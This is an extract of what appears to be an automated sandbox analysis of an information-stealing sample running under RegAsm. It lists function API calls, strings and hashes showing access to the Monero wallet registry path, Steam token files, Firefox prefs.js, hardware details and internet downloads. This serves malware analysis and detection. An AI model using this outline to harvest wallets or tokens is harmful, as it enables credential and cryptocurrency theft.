                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFileHandleModuleNameOpenProcess
                                                                            • String ID: 2IA
                                                                            • API String ID: 3183270410-4174278054
                                                                            • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                            • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                            • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                            • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                            Function 00414437 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                            • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2678630583-0
                                                                            • Opcode ID: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                            • Instruction ID: 90c6c212f9a98d1f3efa3e19a0f967dde8f702bf728512cfd2e6caf086527d46
                                                                            • Opcode Fuzzy Hash: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                            • Instruction Fuzzy Hash: 3E311E75900148AFCB11DFA4C995ADEBBB8FF18304F50412FF906A7281DB789B88CB95
                                                                            Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                            • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3676486918-0
                                                                            • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                            • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                            • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                            • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                            Function 0040FE18 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3676486918-0
                                                                            • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                            • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                            • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                            • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                            Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6%@$6%@
                                                                            • API String ID: 0-3369382886
                                                                            • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                            • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                            • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                            • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                            Function 00414538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041453D
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042655B), ref: 0041458E
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                            • API String ID: 40794102-3507145866
                                                                            • Opcode ID: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                            • Instruction ID: 1e33fb55044e108cdc823b8717a6e4474b59c1838e8e2ba6a3b9a54ee3721495
                                                                            • Opcode Fuzzy Hash: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                            • Instruction Fuzzy Hash: 61215B71C00148AACB14FBE5C966BDDBB74AF18308F50817EE411725D2DB78174CCA66
                                                                            Function 004165D9 Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004165DE
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                            • lstrcat.KERNEL32(?), ref: 0041663F
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                              • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                              • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                              • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                              • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                              • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                              • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                              • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                              • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                              • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                            • String ID:
                                                                            • API String ID: 25485560-0
                                                                            • Opcode ID: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                            • Instruction ID: 6e5b766fc683c4e74d5122aabce2b8c3392ef196e7b74699665c3906b53d7570
                                                                            • Opcode Fuzzy Hash: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                            • Instruction Fuzzy Hash: 5A41AD7194022DABCF10EBF0EC13DED7B79AB18314F00466AF844A2192E77997958B96
                                                                            Function 6CC33060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC33095
                                                                              • Part of subcall function 6CC335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                              • Part of subcall function 6CC335A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                              • Part of subcall function 6CC335A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                              • Part of subcall function 6CC335A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                              • Part of subcall function 6CC335A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                              • Part of subcall function 6CC335A0: __aulldiv.LIBCMT ref: 6CC336E4
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3309F
                                                                              • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                              • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                              • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                              • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                            • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC330BE
                                                                              • Part of subcall function 6CC330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC33127
                                                                              • Part of subcall function 6CC330F0: __aulldiv.LIBCMT ref: 6CC33140
                                                                              • Part of subcall function 6CC6AB2A: __onexit.LIBCMT ref: 6CC6AB30
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                            • String ID:
                                                                            • API String ID: 4291168024-0
                                                                            • Opcode ID: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                            • Instruction ID: 4138aa6dcedeec23922773e152800c6dd72218e3c0fb0f0fc5209c502e6b804a
                                                                            • Opcode Fuzzy Hash: 07c4669e924b16a431b55ed6b94c865e92857ddd96191e44ecd686c4bebf0f38
                                                                            • Instruction Fuzzy Hash: 70F02D2AE207499BCB10DFB899811E67374AF6B114F501319EC8853711FF30A1D983C9
                                                                            Function 00411EB8 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00411EBD
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                                              • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                              • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                              • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                              • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                              • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                              • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                              • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                              • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                              • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                            • String ID: B
                                                                            • API String ID: 1244342732-1255198513
                                                                            • Opcode ID: d47216f464f1931b2df8ee856ee7241989d4def9523d68925adc3d07f2806224
                                                                            • Instruction ID: ca3b8767cd7f053f48781c5f7d31f618261e7555551c60cb52e9541aca8074f8
                                                                            • Opcode Fuzzy Hash: d47216f464f1931b2df8ee856ee7241989d4def9523d68925adc3d07f2806224
                                                                            • Instruction Fuzzy Hash: 49529E70904288EADB15EBE4D556BDDBBB49F28308F5040BEE449736C2DB781B4CCB66
                                                                            Function 0040B8AF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040B8B4
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                              • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                              • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                              • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                              • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
